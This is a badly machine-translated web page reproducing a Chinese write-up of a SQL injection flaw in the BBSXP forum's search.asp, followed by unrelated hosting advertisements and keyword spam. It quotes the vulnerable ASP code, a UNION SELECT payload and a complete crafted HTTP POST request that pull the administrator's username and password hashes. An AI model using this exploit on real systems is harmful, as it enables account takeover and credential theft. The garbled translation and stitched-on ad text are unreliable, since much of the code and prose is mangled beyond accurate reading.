注入bbsxp注入漏洞(BBSXP injection vulnerability)

bbsxp  时间:2021-02-07  阅读:()

bbsxp注入漏洞BBSXP injection vulnerability

BBSXP injection vulnerability

BBSXP injection vulnerability

The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly

-- I found a summary of the bbsxp5 sp1 vulnerability

There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.

After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.

BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.

But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes

BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.

Obviously there are Numbers and strings in the query that must

not be used as input values. You can't input as a value, whydo you enter it?

That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp

(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >

The < %top

If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")

DetectPost

If the Request (" menu ") = "ok" then

Search = Request (" search ")

Forumid forumid = Request (" ")

TimeLimit = Request (" TimeLimit ")

The content = the HTMLEncode (Request (" content ") )

Searchxm= the HTMLEncode (Request (" searchxm "))

Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )

Searchxm2 = replace (searchxm2, "@", "&")

If the content = empty then the content = Request. Cookies ("u sername ")

If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"

If the search = "author" then

The item = "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"

SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""

"& TimeLimitList &" order by lasttime Desc"

Rs. The Open SQL, Conn, 1

. . . . . .

Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.

1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"

As long as the forumid input is empty, forumidor is empty.

2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "

TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",

Change to "and lasttime > getdate () -1" in MSSQL.

3. If the search = "author" then

The item= "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

As long as the search = "author",

If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,

As soon as we construct the input and pass the above statement,the SQL statement becomes:

Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'

And lasttime > now () - 1 order by lasttime Desc

There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.

Let' s look at the HTMLEncode function first

The function the HTMLEncode (fString)

FString = replace (fString, "; ", "& # 59;")

FString = server. The htmlencode (fString)

FString = replace (fString, "' ", "& # 39;")

FString = replace (fString, "-", "& # 45; & # 45;")

FString = replace (fString, "", " the & # 92; ")

FString = replace (fString, vbCrlf, "< br >")

The HTMLEncode = fString

End the function

The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.

There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,

It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit

It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and

The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use

Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,

Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from

[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword

= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.

And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.

The friend who knows the SQL statement will see it.

The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.

Here you can construct your own queries, and I give you areference.

Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,

I should also advise him to save energy and brain power.

(figure 1)

[2]

The construction is submitted as follows:

POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1

Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp

The Accept - Language: useful - cn

The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate

The user-agent: Mozilla / 4.

0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)

Host: localhost: 8000

The Content - Length: 481

Connection: Keep Alive

The cache-control: no - Cache

Cookie: eremite = 0; Userpass =

E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =

OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0

The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.

Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.

Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC

CB % % % CB D1 F7

I've written an HTML page for the searchxm part, which can be

Megalayer美国独立服务器配置及性能速度综合评测

Megalayer 商家在之前也有记录过,商家开始只有提供香港站群服务器和独立服务器,后来也有增加到美国独立服务器,以及前几天也有介绍到有增加香港VPS主机。对于香港服务器之前有过评测(Megalayer香港服务器配置一览及E3-1230 8GB服务器评测记录),这里申请到一台美国独立服务器,所以也准备简单的评测记录。目前市场上我们看到很多商家提供VPS或者云服务器基本上没有什么特别的,但是独立服...

ftlcloud9元/月,美国云服务器,1G内存/1核/20g硬盘/10M带宽不限/10G防御

ftlcloud(超云)目前正在搞暑假促销,美国圣何塞数据中心的云服务器低至9元/月,系统盘与数据盘分离,支持Windows和Linux,免费防御CC攻击,自带10Gbps的DDoS防御。FTL-超云服务器的主要特色:稳定、安全、弹性、高性能的云端计算服务,快速部署,并且可根据业务需要扩展计算能力,按需付费,节约成本,提高资源的有效利用率。活动地址:https://www.ftlcloud.com...

简单测评v5.net的美国cn2云服务器:电信双程cn2+联通AS9929+移动直连

v5.net一直做独立服务器这块儿的,自从推出云服务器(VPS)以来站长一直还没有关注过,在网友的提醒下弄了个6G内存、2核、100G SSD的美国云服务器来写测评,主机测评给大家趟雷,让你知道v5.net的美国云服务器效果怎么样。本次测评数据仅供参考,有兴趣的还是亲自测试吧! 官方网站:https://v5.net/cloud.html 从显示来看CPU是e5-2660(2.2GHz主频),...

bbsxp为你推荐
站长故事科学家的故事200字万网核心代理万网代理商?中国万网认证核心分销商?flash导航条如何添加FLASH导航条ps抠图技巧请教PS抠图技巧!!!不兼容Google play 服务提示不兼容怎么办?网店推广网站怎么免费推广淘宝店铺?彩信中心移动的彩信中心是?主页是?收不到彩信,怎么设置?宕机何谓宕机?二层交换机什么是二层交换机和三层交换机???云挂机云挂机每天2+元你提了吗?
vps 安徽双线服务器租用 汉邦高科域名申请 如何注册中文域名 免费顶级域名 七牛优惠码 idc评测 photonvps 165邮箱 vip购优汇 什么是刀片服务器 双线主机 静态空间 hktv 免费网页申请 网站加速软件 免备案cdn加速 rewritecond 闪讯网 windowssever2008 更多